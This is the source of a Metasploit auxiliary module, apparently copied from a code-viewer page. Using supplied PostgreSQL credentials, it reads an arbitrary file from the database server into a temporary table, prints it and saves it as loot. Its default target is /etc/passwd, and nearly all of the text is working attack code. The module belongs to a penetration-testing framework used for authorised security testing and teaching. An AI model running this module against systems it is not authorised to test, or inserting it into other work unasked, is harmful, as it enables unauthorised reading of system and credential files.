Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Postgres
8
  include Msf::Auxiliary::Report
9
  include Msf::OptionalSession::PostgreSQL
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'PostgreSQL Server Generic Query',
14
      'Description'    => %q{
15
          This module imports a file local on the PostgreSQL Server into a
16
          temporary table, reads it, and then drops the temporary table.
17
          It requires PostgreSQL credentials with table CREATE privileges
18
          as well as read privileges to the target file.
19
      },
20
      'Author'         => [ 'todb' ],
21
      'License'        => MSF_LICENSE
22
    ))
23

24
    register_options(
25
      [
26
        OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
27
      ]
28
    )
29

30
    deregister_options( 'SQL', 'RETURN_ROWSET' )
31
  end
32

33
  def rhost
34
    datastore['RHOST']
35
  end
36

37
  def rport
38
    datastore['RPORT']
39
  end
40

41
  def run
42
    self.postgres_conn = session.client if session
43
    ret = postgres_read_textfile(datastore['RFILE'])
44
    case ret.keys[0]
45
    when :conn_error
46
      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
47
    when :sql_error
48
      case ret[:sql_error]
49
      when /^C58P01/
50
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - No such file or directory."
51
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
52
      when /^C42501/
53
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient file permissions."
54
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
55
      else
56
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"
57
      end
58
    when :complete
59
      loot = ''
60
      ret[:complete].rows.each { |row|
61
        print_line(row.first)
62
        loot << row.first
63
      }
64
      # No idea what the actual ctype will be, text/plain is just a guess
65
      path = store_loot('postgres.file', 'text/plain', postgres_conn.peerhost, loot, datastore['RFILE'])
66
      print_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{datastore['RFILE']} saved in #{path}")
67
      vprint_good  "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Command complete."
68
    end
69
    postgres_logout if self.postgres_conn && session.blank?
70
  end
71
end
72

73